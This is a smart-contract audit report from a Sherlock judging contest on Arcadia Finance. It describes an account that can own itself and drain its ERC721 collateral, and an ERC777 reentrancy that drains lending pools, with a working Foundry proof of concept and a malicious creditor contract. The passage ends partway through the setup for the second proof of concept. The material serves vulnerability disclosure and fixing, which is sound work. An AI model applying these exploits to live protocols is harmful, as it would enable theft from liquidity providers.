
2023-12-arcadia-judging

Issue H-1: AccountV1#flashActionByCreditor can be used to drain assets from account without withdrawing

Source: #140

Found by

0x52

Summary

AccountV1#flashActionByCreditor is designed to allow atomic flash actions moving funds from the owner of the account. By making the account own itself, these arbitrary calls can be used to transfer ERC721 assets directly out of the account. The assets being transferred from the account will still show as deposited on the account allowing it to take out loans from creditors without having any actual assets.

Vulnerability Detail

The overview of the exploit is as follows:

1) Deposit ERC721
2) Set creditor to a maliciously designed creditor
3) Transfer the account to itself
4) flashActionByCreditor to transfer the ERC721
    4a) The account owns itself, so _transferFromOwner allows transfers from the account
    4b) The account is now empty but still thinks it has the ERC721
5) Use a maliciously designed liquidator contract to call auctionBoughtIn
    and transfer the account back to the attacker
6) Update the creditor to a legitimate creditor
7) Take out a loan against nothing
8) Profit

The key to this exploit is that the account is able to be its own owner. Paired with a maliciously designed creditor (the creditor can be set to any address), flashActionByCreditor can then be called by the attacker.

AccountV1.sol#L770-L772

if (transferFromOwnerData.assets.length > 0) {
    _transferFromOwner(transferFromOwnerData, actionTarget);
}

In these lines the ERC721 token is transferred out of the account. The issue is that even though the token is transferred out, the erc721Stored array is not updated to reflect this change.
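
To make "not updated" concrete, here is a minimal sketch of the kind of bookkeeping removal a proper withdrawal would perform and that the _transferFromOwner path skips. The array names are modelled on the report's erc721Stored; the exact layout is an assumption, not Arcadia's verbatim code.

pragma solidity ^0.8.22;

// Illustrative sketch only: array names are assumptions, not Arcadia's actual code.
contract Erc721BookkeepingSketch {
    address[] internal erc721Stored;
    uint256[] internal erc721TokenIds;

    // A bookkeeping-aware withdrawal removes the entry (swap-and-pop) when the
    // NFT leaves the account. The flashActionByCreditor/_transferFromOwner path
    // performs no such update, so the stale entry survives.
    function _removeStoredERC721(address asset, uint256 id) internal {
        uint256 length = erc721Stored.length;
        for (uint256 i; i < length; ++i) {
            if (erc721Stored[i] == asset && erc721TokenIds[i] == id) {
                erc721Stored[i] = erc721Stored[length - 1];
                erc721TokenIds[i] = erc721TokenIds[length - 1];
                erc721Stored.pop();
                erc721TokenIds.pop();
                break;
            }
        }
    }
}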

AccountV1.sol#L570-L572

function auctionBoughtIn(address recipient) external onlyLiquidator nonReentrant {
    _transferOwnership(recipient);
}

As seen above, auctionBoughtIn has no requirement beyond being called by the liquidator. Since the liquidator is also malicious, it can abuse this function to set the owner to any address, which allows the attacker to recover ownership of the account. The attacker now has an account that still considers the ERC721 token as owned, even though that token isn't actually present in the account.
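
For illustration, a minimal sketch of the kind of attacker-controlled "liquidator" the malicious creditor could report. The contract and function names below are hypothetical; only the auctionBoughtIn(address) signature comes from the snippet above.

pragma solidity ^0.8.22;

// Interface derived from the auctionBoughtIn snippet shown above.
interface IAccountAuction {
    function auctionBoughtIn(address recipient) external;
}

// Hypothetical attacker-controlled liquidator: if the malicious creditor reports
// this contract as the account's liquidator, calling recoverAccount() passes the
// onlyLiquidator check and transfers ownership of the self-owned account back to
// the attacker.
contract MaliciousLiquidator {
    function recoverAccount(address account, address attacker) external {
        IAccountAuction(account).auctionBoughtIn(attacker);
    }
}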

Now the account creditor can be set to a legitimate pool and a loan taken out against no collateral at all.

Impact

Account can take out completely uncollateralized loans, causing massive losses to all lending pools.

Code Snippet

AccountV1.sol#L265-L270

Tool used

Manual Review

Recommendation

The root cause of this issue is that the account can own itself. The fix is simple: make the account unable to own itself by having transferOwnership revert when newOwner == address(this).

Discussion

sherlock-admin2

1 comment(s) were left on this issue during the judging contest.

takarez commented:

valid: flashActionByCreditor should be mitigated; high(7)

j-vp

Created a (very) quick & dirty POC to confirm the validity:

/**
 * Created by Pragma Labs
 * SPDX-License-Identifier: MIT
 */
pragma solidity 0.8.22;

import { Fork_Test } from "../Fork.t.sol";

import { ERC20 } from "../../../lib/solmate/src/tokens/ERC20.sol";
import { ERC721 } from "../../../lib/solmate/src/tokens/ERC721.sol";

import { LiquidityAmounts } from "../../../src/asset-modules/UniswapV3/libraries/LiquidityAmounts.sol";
import { LiquidityAmountsExtension } from
    "../../utils/fixtures/uniswap-v3/extensions/libraries/LiquidityAmountsExtension.sol";
import { INonfungiblePositionManagerExtension } from
    "../../utils/fixtures/uniswap-v3/extensions/interfaces/INonfungiblePositionManagerExtension.sol";
import { ISwapRouter } from "../../utils/fixtures/uniswap-v3/extensions/interfaces/ISwapRouter.sol";
import { IUniswapV3Factory } from "../../utils/fixtures/uniswap-v3/extensions/interfaces/IUniswapV3Factory.sol";
import { IUniswapV3PoolExtension } from
    "../../utils/fixtures/uniswap-v3/extensions/interfaces/IUniswapV3PoolExtension.sol";
import { TickMath } from "../../../src/asset-modules/UniswapV3/libraries/TickMath.sol";
import { UniswapV3AM } from "../../../src/asset-modules/UniswapV3/UniswapV3AM.sol";
import { ActionData } from "../../../src/interfaces/IActionBase.sol";
import { IPermit2 } from "../../../src/interfaces/IPermit2.sol";
import { AccountV1 } from "../../../src/accounts/AccountV1.sol";

/**
 * @notice Fork tests for "UniswapV3AM" to test issue 140.
 */
contract UniswapV3AM_Fork_Test is Fork_Test {
    /*///////////////////////////////////////////////////////////////
                            CONSTANTS
    ///////////////////////////////////////////////////////////////*/
    INonfungiblePositionManagerExtension internal constant NONFUNGIBLE_POSITION_MANAGER =
        INonfungiblePositionManagerExtension(0x03a520b32C04BF3bEEf7BEb72E919cf822Ed34f1);
    ISwapRouter internal constant SWAP_ROUTER = ISwapRouter(0x2626664c2603336E57B271c5C0b26F421741e481);
    IUniswapV3Factory internal constant UNISWAP_V3_FACTORY =
        IUniswapV3Factory(0x33128a8fC17869897dcE68Ed026d694621f6FDfD);

    /*///////////////////////////////////////////////////////////////
                            TEST CONTRACTS
    ///////////////////////////////////////////////////////////////*/

    UniswapV3AM internal uniV3AM_;
    MaliciousCreditor internal maliciousCreditor;

    /*///////////////////////////////////////////////////////////////
                            SET-UP FUNCTION
    ///////////////////////////////////////////////////////////////*/

    function setUp() public override {
        Fork_Test.setUp();

        // Deploy uniV3AM_.
        vm.startPrank(users.creatorAddress);
        uniV3AM_ = new UniswapV3AM(address(registryExtension), address(NONFUNGIBLE_POSITION_MANAGER));
        registryExtension.addAssetModule(address(uniV3AM_));
        uniV3AM_.setProtocol();
        vm.stopPrank();

        vm.label({ account: address(uniV3AM_), newLabel: "Uniswap V3 Asset Module" });

        maliciousCreditor = new MaliciousCreditor(users.creatorAddress);
        vm.startPrank(users.creatorAddress);
        registryExtension.setRiskParametersOfPrimaryAsset(
            address(maliciousCreditor), address(DAI), 0, type(uint112).max, 9000, 9500
        );
        registryExtension.setRiskParametersOfPrimaryAsset(
            address(maliciousCreditor), address(USDC), 0, type(uint112).max, 9000, 9500
        );
        registryExtension.setRiskParametersOfPrimaryAsset(
            address(maliciousCreditor), address(WETH), 0, type(uint112).max, 9000, 9500
        );
        registryExtension.setRiskParametersOfDerivedAM(
            address(maliciousCreditor), address(uniV3AM_), type(uint112).max, 10_000
        );
        registryExtension.setRiskParameters(address(maliciousCreditor), 0, 0, 10);
        vm.stopPrank();
    }

    /*////////////////////////////////////////////////////////////////
                        HELPER FUNCTIONS
    ////////////////////////////////////////////////////////////////*/
    function isWithinAllowedRange(int24 tick) public pure returns (bool) {
        int24 MIN_TICK = -887_272;
        int24 MAX_TICK = -MIN_TICK;
        return (tick < 0 ? uint256(-int256(tick)) : uint256(int256(tick))) <= uint256(uint24(MAX_TICK));
    }

    function addLiquidity(
        IUniswapV3PoolExtension pool,
        uint128 liquidity,
        address liquidityProvider_,
        int24 tickLower,
        int24 tickUpper,
        bool revertsOnZeroLiquidity
    ) public returns (uint256 tokenId) {
        (uint160 sqrtPrice,,,,,,) = pool.slot0();

        (uint256 amount0, uint256 amount1) = LiquidityAmounts.getAmountsForLiquidity(
            sqrtPrice, TickMath.getSqrtRatioAtTick(tickLower), TickMath.getSqrtRatioAtTick(tickUpper), liquidity
        );

        tokenId = addLiquidity(pool, amount0, amount1, liquidityProvider_, tickLower, tickUpper, revertsOnZeroLiquidity);
    }

    function addLiquidity(
        IUniswapV3PoolExtension pool,
        uint256 amount0,
        uint256 amount1,
        address liquidityProvider_,
        int24 tickLower,
        int24 tickUpper,
        bool revertsOnZeroLiquidity
    ) public returns (uint256 tokenId) {
        // Check if test should revert or be skipped when liquidity is zero.
        // This is hard to check with assumes of the fuzzed inputs due to rounding errors.
        if (!revertsOnZeroLiquidity) {
            (uint160 sqrtPrice,,,,,,) = pool.slot0();
            uint256 liquidity = LiquidityAmountsExtension.getLiquidityForAmounts(
                sqrtPrice,
                TickMath.getSqrtRatioAtTick(tickLower),
                TickMath.getSqrtRatioAtTick(tickUpper),
                amount0,
                amount1
            );
            vm.assume(liquidity > 0);
        }

        address token0 = pool.token0();
        address token1 = pool.token1();
        uint24 fee = pool.fee();

        deal(token0, liquidityProvider_, amount0);
        deal(token1, liquidityProvider_, amount1);
        vm.startPrank(liquidityProvider_);
        ERC20(token0).approve(address(NONFUNGIBLE_POSITION_MANAGER), type(uint256).max);
        ERC20(token1).approve(address(NONFUNGIBLE_POSITION_MANAGER), type(uint256).max);
        (tokenId,,,) = NONFUNGIBLE_POSITION_MANAGER.mint(
            INonfungiblePositionManagerExtension.MintParams({
                token0: token0,
                token1: token1,
                fee: fee,
                tickLower: tickLower,
                tickUpper: tickUpper,
                amount0Desired: amount0,
                amount1Desired: amount1,
                amount0Min: 0,
                amount1Min: 0,
                recipient: liquidityProvider_,
                deadline: type(uint256).max
            })
        );
        vm.stopPrank();
    }

    function assertInRange(uint256 actualValue, uint256 expectedValue, uint8 precision) internal {
        if (expectedValue == 0) {
            assertEq(actualValue, expectedValue);
        } else {
            vm.assume(expectedValue > 10 ** (2 * precision));
            assertGe(actualValue * (10 ** precision + 1) / 10 ** precision, expectedValue);
            assertLe(actualValue * (10 ** precision - 1) / 10 ** precision, expectedValue);
        }
    }

    /*///////////////////////////////////////////////////////////////
                            FORK TESTS
    ///////////////////////////////////////////////////////////////*/

    function testFork_Success_deposit2(uint128 liquidity, int24 tickLower, int24 tickUpper) public {
        vm.assume(liquidity > 10_000);

        IUniswapV3PoolExtension pool =
            IUniswapV3PoolExtension(UNISWAP_V3_FACTORY.getPool(address(DAI), address(WETH), 100));
        (, int24 tickCurrent,,,,,) = pool.slot0();

        // Check that ticks are within allowed ranges.
        tickLower = int24(bound(tickLower, tickCurrent - 16_095, tickCurrent + 16_095));
        tickUpper = int24(bound(tickUpper, tickCurrent - 16_095, tickCurrent + 16_095));
        // Ensure Tick is correctly spaced.
        {
            int24 tickSpacing = UNISWAP_V3_FACTORY.feeAmountTickSpacing(pool.fee());
            tickLower = tickLower / tickSpacing * tickSpacing;
            tickUpper = tickUpper / tickSpacing * tickSpacing;
        }
        vm.assume(tickLower < tickUpper);
        vm.assume(isWithinAllowedRange(tickLower));
        vm.assume(isWithinAllowedRange(tickUpper));

        // Check that Liquidity is within allowed ranges.
        vm.assume(liquidity <= pool.maxLiquidityPerTick());

        // Balance pool before mint
        uint256 amountDaiBefore = DAI.balanceOf(address(pool));
        uint256 amountWethBefore = WETH.balanceOf(address(pool));

        // Mint liquidity position.
        uint256 tokenId = addLiquidity(pool, liquidity, users.accountOwner, tickLower, tickUpper, false);

        // Balance pool after mint
        uint256 amountDaiAfter = DAI.balanceOf(address(pool));
        uint256 amountWethAfter = WETH.balanceOf(address(pool));

        // Amounts deposited in the pool.
        uint256 amountDai = amountDaiAfter - amountDaiBefore;
        uint256 amountWeth = amountWethAfter - amountWethBefore;

        // Precision oracles up to % -> need to deposit at least 1000 tokens or rounding errors lead to bigger errors.
        vm.assume(amountDai + amountWeth > 100);

        // Deposit the Liquidity Position.
        {
            address[] memory assetAddress = new address[](1);
            assetAddress[0] = address(NONFUNGIBLE_POSITION_MANAGER);

            uint256[] memory assetId = new uint256[](1);
            assetId[0] = tokenId;

            uint256[] memory assetAmount = new uint256[](1);
            assetAmount[0] = 1;
            vm.startPrank(users.accountOwner);
            ERC721(address(NONFUNGIBLE_POSITION_MANAGER)).approve(address(proxyAccount), tokenId);
            proxyAccount.deposit(assetAddress, assetId, assetAmount);
            vm.stopPrank();
        }

        vm.startPrank(users.accountOwner);
        // exploit starts: user adds malicious creditor to keep the "hook" after the account transfer
        proxyAccount.openMarginAccount(address(maliciousCreditor));

        // avoid any cooldowns
        uint256 time = block.timestamp;
        vm.warp(time + 1 days);

        // transfer the account to itself
        factory.safeTransferFrom(users.accountOwner, address(proxyAccount), address(proxyAccount));
        vm.stopPrank();
        assertEq(proxyAccount.owner(), address(proxyAccount));

        vm.startPrank(users.creatorAddress);

        // from the malicious creditor set earlier, start a flashActionByCreditor which withdraws the univ3lp as a "transferFromOwner"
        maliciousCreditor.doFlashActionByCreditor(address(proxyAccount), tokenId, address(NONFUNGIBLE_POSITION_MANAGER));
        vm.stopPrank();

        // univ3lp changed ownership to the malicious creditor
        assertEq(ERC721(address(NONFUNGIBLE_POSITION_MANAGER)).ownerOf(tokenId), address(maliciousCreditor));
        assertEq(ERC721(address(NONFUNGIBLE_POSITION_MANAGER)).balanceOf(address(proxyAccount)), 0);

        // account still shows it has a collateral value
        assertGt(proxyAccount.getCollateralValue(), 0);

        // univ3lp is still accounted for in the account
        (address[] memory assets, uint256[] memory ids, uint256[] memory amounts) = proxyAccount.generateAssetData();
        assertEq(assets[0], address(NONFUNGIBLE_POSITION_MANAGER));
        assertEq(ids[0], tokenId);
        assertEq(amounts[0], 1);
    }
}

contract MaliciousCreditor {
    address public riskManager;

    constructor(address riskManager_) {
        // Set the risk manager.
        riskManager = riskManager_;
    }

    function openMarginAccount(uint256 version)
        public
        returns (bool success, address numeraire_, address liquidator_, uint256 minimumMargin_)
    {
        return (true, 0x50c5725949A6F0c72E6C4a641F24049A917DB0Cb, address(0), 0); //dai
    }

    function doFlashActionByCreditor(address targetAccount, uint256 tokenId, address nftMgr) public {
        ActionData memory withdrawData;
        IPermit2.PermitBatchTransferFrom memory permit;
        bytes memory signature;
        bytes memory actionTargetData;

        ActionData memory transferFromOwnerData;
        transferFromOwnerData.assets = new address[](1);
        transferFromOwnerData.assets[0] = nftMgr;
        transferFromOwnerData.assetIds = new uint256[](1);
        transferFromOwnerData.assetIds[0] = tokenId;
        transferFromOwnerData.assetAmounts = new uint256[](1);
        transferFromOwnerData.assetAmounts[0] = 1;
        transferFromOwnerData.assetTypes = new uint256[](1);
        transferFromOwnerData.assetTypes[0] = 1;

        bytes memory actionData = abi.encode(withdrawData, transferFromOwnerData, permit, signature, actionTargetData);

        AccountV1(targetAccount).flashActionByCreditor(address(this), actionData);
    }

    function executeAction(bytes memory actionData) public returns (ActionData memory) {
        ActionData memory withdrawData;
        return withdrawData;
    }

    function getOpenPosition(address) public pure returns (uint256) {
        return 0;
    }

    function onERC721Received(address, address, uint256, bytes calldata) public pure returns (bytes4) {
        return this.onERC721Received.selector;
    }
}

j-vp

I don't see a reasonable usecase where an account should own itself. wdyt @Thomas-Smets ?

function transferOwnership(address newOwner) external onlyFactory notDuringAuction {
    if (block.timestamp <= lastActionTimestamp + COOL_DOWN_PERIOD) revert AccountErrors.CoolDownPeriodNotPassed();

    // The Factory will check that the new owner is not address(0).
+   if (newOwner == address(this)) revert NoTransferToSelf();
    owner = newOwner;
}

function _transferOwnership(address newOwner) internal {
    // The Factory will check that the new owner is not address(0).
+   if (newOwner == address(this)) revert NoTransferToSelf();
    owner = newOwner;
    IFactory(FACTORY).safeTransferAccount(newOwner);
}

Thomas-Smets

No indeed, that should fix it

Thomas-Smets

Fixes:

sherlock-admin

The protocol team fixed this issue in PR/commit arcadia-finance/accounts-v2#171.

IAm0x52

Fix looks good. Accounts can no longer own themselves as all transfers of ownership to self are now blocked.

sherlock-admin4

The Lead Senior Watson signed off on the fix.

Issue H-2: Reentrancy in flashAction() allows draining liquidity pools

Source: #153

Found by

0xadrii, zzykxx

Summary

It is possible to drain a liquidity pool/creditor if the pool’s asset is an ERC777 token by triggering a reentrancy flow using flash actions.

Vulnerability Detail

The following vulnerability describes a complex flow that allows draining any liquidity pool where the underlying asset is an ERC777 token. Before diving into the vulnerability, it is important to properly understand and highlight some concepts from Arcadia that are relevant in order to allow this vulnerability to take place:

  • Flash actions: flash actions in Arcadia operate in a similar fashion to flash loans. Any account owner will be able to borrow an arbitrary amount from the creditor without putting any collateral as long as the account remains in a healthy state at the end of execution. The following steps summarize what actually happens when LendingPool.flashAction() flow is triggered:

    1. The amount borrowed (plus fees) will be minted to the account as debt tokens. This means that the amount borrowed in the flash action will be accounted as debt during the whole flashAction() execution. If a flash action borrowing 30 tokens is triggered for an account that already has 10 tokens in debt, the debt balance of the account will increase to 40 tokens + fees.
    2. Borrowed asset will be transferred to the actionTarget. The actionTarget is an arbitrary address passed as parameter in the flashAction(). It is important to be aware of the fact that transferring the borrowed funds is performed prior to calling flashActionByCreditor(), which is the function that will end up verifying the account’s health state. This is the step where the reentrancy will be triggered by the actionTarget.
    3. The account’s flashActionByCreditor() function is called. This is the last step in the execution function, where a health check for the account is performed (among other things).
    // LendingPool.sol
    
    function flashAction(
            uint256 amountBorrowed,
            address account,
            address actionTarget, 
            bytes calldata actionData,
            bytes3 referrer
        ) external whenBorrowNotPaused processInterests {
            ... 
    
            uint256 amountBorrowedWithFee = amountBorrowed + amountBorrowed.mulDivUp(originationFee, ONE_4);
    
            ...
     
            // Mint debt tokens to the Account, debt must be minted before the actions in the Account are performed.
            _deposit(amountBorrowedWithFee, account);
    
            ...
    
            // Send Borrowed funds to the actionTarget.
            asset.safeTransfer(actionTarget, amountBorrowed);
     
            // The Action Target will use the borrowed funds (optionally with additional assets withdrawn from the Account)
            // to execute one or more actions (swap, deposit, mint...).
            // Next the action Target will deposit any of the remaining funds or any of the recipient token
            // resulting from the actions back into the Account.
            // As last step, after all assets are deposited back into the Account a final health check is done:
            // The Collateral Value of all assets in the Account is bigger than the total liabilities against the Account (including the debt taken during this function).
            // flashActionByCreditor also checks that the Account indeed has opened a margin account for this Lending Pool.
            {
                uint256 accountVersion = IAccount(account).flashActionByCreditor(actionTarget, actionData);
                if (!isValidVersion[accountVersion]) revert LendingPoolErrors.InvalidVersion();
            }
     
            ... 
        }
  • Collateral value: Each creditor is configured with some risk parameters in the Registry contract. One of the risk parameters is the minUsdValue, which is the minimum USD value any asset must have when it is deposited into an account for the creditor to consider such collateral as valid. If the asset does not reach the minUsdValue, it will simply be accounted with a value of 0. For example: if the minUsdValue configured for a given creditor is 100 USD and we deposit an asset in our account worth 99 USD (let’s say 99 USDT), the USDT collateral will be accounted as 0. This means that our USDT will be worth nothing in the eyes of the creditor. However, if we deposit one more USDT token into the account, our USD collateral value will increase to 100 USD, reaching the minUsdValue. Now, the creditor will consider our account’s collateral to be worth 100 USD instead of 0 USD. (A minimal sketch of this thresholding appears after this list.)

  • Liquidations: Arcadia liquidates unhealthy accounts using a dutch-auction model. When a liquidation is triggered via Liquidator.liquidateAccount() all the information regarding the debt and assets from the account will be stored in auctionInformation_ , which maps account addresses to an AuctionInformation struct. An important field in this struct is the assetShares, which will store the relative value of each asset, with respect to the total value of the Account.

    When a user wants to bid for an account in liquidation, the Liquidator.bid() function must be called. An important feature of this function is that it does not require the bidder to repay the loan in full (thus getting the full collateral in the account). Instead, the bidder can specify which collateral assets and amounts they want to obtain back, and the contract will compute the amount of debt the bidder must repay for that amount of collateral. If the user wants to repay the full loan, all the collateral in the account will be specified by the bidder.
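
As a reference for the minUsdValue behaviour described in the list above, here is a minimal sketch of the thresholding. It is illustrative only and not Arcadia's registry implementation.

pragma solidity ^0.8.22;

// Any collateral value below the creditor's configured minUsdValue is treated as 0.
// With minUsdValue = 100e18: a 99e18 value is floored to 0, while 100e18 stays 100e18.
function applyMinUsdValue(uint256 usdValue, uint256 minUsdValue) pure returns (uint256) {
    return usdValue < minUsdValue ? 0 : usdValue;
}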

With this background, we can now move on to describing the vulnerability in full.

Initially, we will create an account and deposit collateral whose value is in the limit of the configured minUsdValue (if the minUsdValue is 100 tokens, the ideal amount to have will be 100 tokens to maximize gains). We will see why this is required later. The account’s collateral and debt status will look like this:

[Image: vuln1 — initial account collateral and debt status]

The next step after creating the account is to trigger a flash action. As mentioned in the introduction, the borrowed funds will be sent to the actionTarget (this will be a contract we create and control). An important requirement is that if the borrowed asset is an ERC777 token, we will be able to execute the ERC777 callback in our actionTarget contract, enabling us to gain control of the execution flow. Following our example, if we borrowed 200 tokens the account’s status would look like this:

[Image: vuln2 — account status after borrowing 200 tokens via the flash action]

On receiving the borrowed tokens, the actual attack will begin. The actionTarget will trigger the Liquidator.liquidateAccount() function to liquidate our own account. This is possible because the funds borrowed using the flash action are accounted as debt for our account (as we can see in the previous image, the borrowed amount greatly surpasses our account’s collateral value) prior to executing the actionTarget ERC777 callback, making the account susceptible to being liquidated. Executing this function will start the auction process and store data relevant to the account and its debt in the auctionInformation_ mapping.

After finishing the liquidateAccount() execution, the next step for the actionTarget is to place a bid on our own account’s auction by calling Liquidator.bid(). The trick here is to request a small amount of the account’s collateral in the askedAssetAmounts array (if we had 100 tokens as collateral in the account, we could ask for only 1). The small requested amount makes the price to pay for the bid computed by _calculateBidPrice() really small, so that we can maximize our gains. Another requirement is to set the endAuction_ parameter to true (we will see why later):

// Liquidator.sol

function bid(address account, uint256[] memory askedAssetAmounts, bool endAuction_) external nonReentrant {
        AuctionInformation storage auctionInformation_ = auctionInformation[account];
        if (!auctionInformation_.inAuction) revert LiquidatorErrors.NotForSale();

        // Calculate the current auction price of the assets being bought.
        uint256 totalShare = _calculateTotalShare(auctionInformation_, askedAssetAmounts);
        uint256 price = _calculateBidPrice(auctionInformation_, totalShare);

        // Transfer an amount of "price" in "Numeraire" to the LendingPool to repay the Accounts debt.
        // The LendingPool will call a "transferFrom" from the bidder to the pool -> the bidder must approve the LendingPool.
        // If the amount transferred would exceed the debt, the surplus is paid out to the Account Owner and earlyTerminate is True.
        uint128 startDebt = auctionInformation_.startDebt;
        bool earlyTerminate = ILendingPool(auctionInformation_.creditor).auctionRepay(
            startDebt, auctionInformation_.minimumMargin, price, account, msg.sender
        );
        ...
}

After computing the small price to pay for the bid, LendingPool.auctionRepay() will be called. Because we are repaying a really small amount of the debt, the accountDebt <= amount condition will NOT hold, so the only actions performed by LendingPool.auctionRepay() will be transferring the small amount of tokens to pay the bid and _withdraw()-ing (burning) the corresponding debt from the account (only a small amount of debt is burnt here because the bid amount is small). It is also important to note that the earlyTerminate flag will remain false:

// LendingPool.sol

function auctionRepay(uint256 startDebt, uint256 minimumMargin_, uint256 amount, address account, address bidder)
        external
        whenLiquidationNotPaused
        onlyLiquidator 
        processInterests
        returns (bool earlyTerminate)
    {
        // Need to transfer before burning debt or ERC777s could reenter.
        // Address(this) is trusted -> no risk on re-entrancy attack after transfer.
        asset.safeTransferFrom(bidder, address(this), amount);

        uint256 accountDebt = maxWithdraw(account); 
        if (accountDebt == 0) revert LendingPoolErrors.IsNotAnAccountWithDebt();
        if (accountDebt <= amount) {
            // The amount recovered by selling assets during the auction is bigger than the total debt of the Account.
            // -> Terminate the auction and make the surplus available to the Account-Owner.
            earlyTerminate = true;
            unchecked {
                _settleLiquidationHappyFlow(account, startDebt, minimumMargin_, bidder, (amount - accountDebt));
            }
            amount = accountDebt;
        }
  
        _withdraw(amount, address(this), account); 

        emit Repay(account, bidder, amount);
    }

After LendingPool.auctionRepay(), execution will go back to Liquidator.bid(). The account’s auctionBid() function will then be called, which will transfer the 1 token requested by the bidder in the askedAssetAmounts parameter from the account’s collateral to the bidder. This is the most important concept in the attack. Because 1 token moves out of the account’s collateral, the account’s current collateral value decreases from 100 USD to 99 USD, falling under the minimum minUsdValue of 100 USD and thus making the account’s collateral value go straight to 0 in the eyes of the creditor:

[Image: vuln3 — account collateral value falls below minUsdValue and is treated as 0]

Because earlyTerminate was NOT set to true in LendingPool.auctionRepay(), the if (earlyTerminate) condition will be skipped, going straight to evaluating the else if (endAuction_) condition. Because we set the endAuction_ parameter to true when calling the bid() function, _settleAuction() will execute.

// Liquidator.sol

function bid(address account, uint256[] memory askedAssetAmounts, bool endAuction_) external nonReentrant {
        ...

        // Transfer the assets to the bidder.
        IAccount(account).auctionBid(
            auctionInformation_.assetAddresses, auctionInformation_.assetIds, askedAssetAmounts, msg.sender
        );
        // If all the debt is repaid, the auction must be ended, even if the bidder did not set endAuction to true.
        if (earlyTerminate) {
            // Stop the auction, no need to do a health check for the account since it has no debt anymore.
            _endAuction(account);
        }
        // If not all debt is repaid, the bidder can still earn a termination incentive by ending the auction
        // if one of the conditions to end the auction is met.
        // "_endAuction()" will silently fail without reverting, if the auction was not successfully ended.
        else if (endAuction_) {
            if (_settleAuction(account, auctionInformation_)) _endAuction(account);
        }
}

_settleAuction() is where the final steps of the attack will take place. Because we made the collateral value of our account purposely decrease from the minUsdValue, _settleAuction will interpret that all collateral has been sold, and the else if (collateralValue == 0) will evaluate to true, making the creditor’s settleLiquidationUnhappyFlow() function be called:

function _settleAuction(address account, AuctionInformation storage auctionInformation_)
        internal
        returns (bool success)
    {
        // Cache variables.
        uint256 startDebt = auctionInformation_.startDebt;
        address creditor = auctionInformation_.creditor;
        uint96 minimumMargin = auctionInformation_.minimumMargin;

        uint256 collateralValue = IAccount(account).getCollateralValue();
        uint256 usedMargin = IAccount(account).getUsedMargin();
 
        // Check the different conditions to end the auction.
        if (collateralValue >= usedMargin || usedMargin == minimumMargin) { 
            // Happy flow: Account is back in a healthy state.
            // An Account is healthy if the collateral value is equal or greater than the used margin.
            // If usedMargin is equal to minimumMargin, the open liabilities are 0 and the Account is always healthy.
            ILendingPool(creditor).settleLiquidationHappyFlow(account, startDebt, minimumMargin, msg.sender);
        } else if (collateralValue == 0) {
            // Unhappy flow: All collateral is sold.
            ILendingPool(creditor).settleLiquidationUnhappyFlow(account, startDebt, minimumMargin, msg.sender);
        }
        ...

        return true;
    }

Executing the settleLiquidationUnhappyFlow() will burn ALL the remaining debt (balanceOf[account] will return all the remaining balance of debt tokens for the account), and the liquidation will be finished, calling _endLiquidation() and leaving the account with 99 tokens of collateral and a 0 amount of debt (and the actionTarget with ALL the borrowed funds taken from the flash action).

// LendingPool.sol

function settleLiquidationUnhappyFlow(
        address account,
        uint256 startDebt,
        uint256 minimumMargin_,
        address terminator
    ) external whenLiquidationNotPaused onlyLiquidator processInterests {
        ...

        // Any remaining debt that was not recovered during the auction must be written off.
        // Depending on the size of the remaining debt, different stakeholders will be impacted.
        uint256 debtShares = balanceOf[account];
        uint256 openDebt = convertToAssets(debtShares);
        uint256 badDebt;
        ...

        // Remove the remaining debt from the Account now that it is written off from the liquidation incentives/Liquidity Providers.
        _burn(account, debtShares);
        realisedDebt -= openDebt;
        emit Withdraw(msg.sender, account, account, openDebt, debtShares);

        _endLiquidation();

        emit AuctionFinished(
            account, address(this), startDebt, initiationReward, terminationReward, liquidationPenalty, badDebt, 0
        );
    }

After the actionTarget's ERC777 callback execution, the execution flow will return to the initially called flashAction() function, and the final IAccount(account).flashActionByCreditor() function will be called, which will pass all the health checks due to the fact that all the debt from the account was burnt:

// LendingPool.sol

function flashAction(
        uint256 amountBorrowed,
        address account,
        address actionTarget, 
        bytes calldata actionData,
        bytes3 referrer
    ) external whenBorrowNotPaused processInterests {
        
        ...
 
        // The Action Target will use the borrowed funds (optionally with additional assets withdrawn from the Account)
        // to execute one or more actions (swap, deposit, mint...).
        // Next the action Target will deposit any of the remaining funds or any of the recipient token
        // resulting from the actions back into the Account.
        // As last step, after all assets are deposited back into the Account a final health check is done:
        // The Collateral Value of all assets in the Account is bigger than the total liabilities against the Account (including the debt taken during this function).
        // flashActionByCreditor also checks that the Account indeed has opened a margin account for this Lending Pool.
        {
            uint256 accountVersion = IAccount(account).flashActionByCreditor(actionTarget, actionData);
            if (!isValidVersion[accountVersion]) revert LendingPoolErrors.InvalidVersion();
        }
 
        ... 
    }
// AccountV1.sol

function flashActionByCreditor(address actionTarget, bytes calldata actionData)
        external
        nonReentrant
        notDuringAuction
        updateActionTimestamp
        returns (uint256 accountVersion)
    {
        
        ...

        // Account must be healthy after actions are executed.
        if (isAccountUnhealthy()) revert AccountErrors.AccountUnhealthy();

        ...
    }

Proof of Concept

The following proof of concept illustrates how the previously described attack can take place. Follow the steps in order to reproduce it:

  1. Create a ERC777Mock.sol file in lib/accounts-v2/test/utils/mocks/tokens and paste the code found in this github gist.

  2. Import the ERC777Mock and change the MockOracles, MockERC20 and Rates structs in lib/accounts-v2/test/utils/Types.sol to add an additional token777ToUsd, token777 of type ERC777Mock and token777ToUsd rate:

    import "../utils/mocks/tokens/ERC777Mock.sol"; // <----- Import this
    
    ...
    
    struct MockOracles {
        ArcadiaOracle stable1ToUsd;
        ArcadiaOracle stable2ToUsd;
        ArcadiaOracle token1ToUsd;
        ArcadiaOracle token2ToUsd;
        ArcadiaOracle token3ToToken4;
        ArcadiaOracle token4ToUsd;
        ArcadiaOracle token777ToUsd; // <----- Add this
        ArcadiaOracle nft1ToToken1;
        ArcadiaOracle nft2ToUsd;
        ArcadiaOracle nft3ToToken1;
        ArcadiaOracle sft1ToToken1;
        ArcadiaOracle sft2ToUsd;
    }
    
    struct MockERC20 {
        ERC20Mock stable1;
        ERC20Mock stable2;
        ERC20Mock token1;
        ERC20Mock token2;
        ERC20Mock token3;
        ERC20Mock token4;
        ERC777Mock token777; // <----- Add this
    }
    
    ...
    
    struct Rates {
        uint256 stable1ToUsd;
        uint256 stable2ToUsd;
        uint256 token1ToUsd;
        uint256 token2ToUsd;
        uint256 token3ToToken4;
        uint256 token4ToUsd;
        uint256 token777ToUsd; // <----- Add this
        uint256 nft1ToToken1;
        uint256 nft2ToUsd;
        uint256 nft3ToToken1;
        uint256 sft1ToToken1;
        uint256 sft2ToUsd;
    }
